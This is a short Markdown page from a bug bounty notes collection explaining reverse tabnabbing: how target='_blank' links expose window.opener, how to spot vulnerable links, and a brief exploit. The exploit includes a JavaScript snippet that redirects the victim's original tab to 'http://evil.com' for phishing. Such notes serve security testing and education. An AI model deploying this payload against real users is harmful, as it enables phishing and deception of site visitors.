AllAboutBugBounty/Misc/Tabnabbing.md

27 lines
969 B
Markdown
Raw Permalink Normal View History

2021-02-09 10:29:07 +00:00
# Tabnabbing
2022-06-15 10:38:42 +00:00
2021-02-09 10:29:07 +00:00
## Introduction
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
2022-06-15 10:38:42 +00:00
## How to find
2021-02-09 10:29:07 +00:00
```html
<a href="..." target="_blank" rel="" />
<a href="..." target="_blank" />
```
## How to Exploit
1. Attacker posts a link to a website under his control that contains the following JS code:
```html
<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://evil.com');
if (window.parent != window) window.parent.location.replace('http://evil.com');
</script>
</html>
```
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
2022-06-15 10:38:42 +00:00
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
## References
* [Hackerone #260278](https://hackerone.com/reports/260278)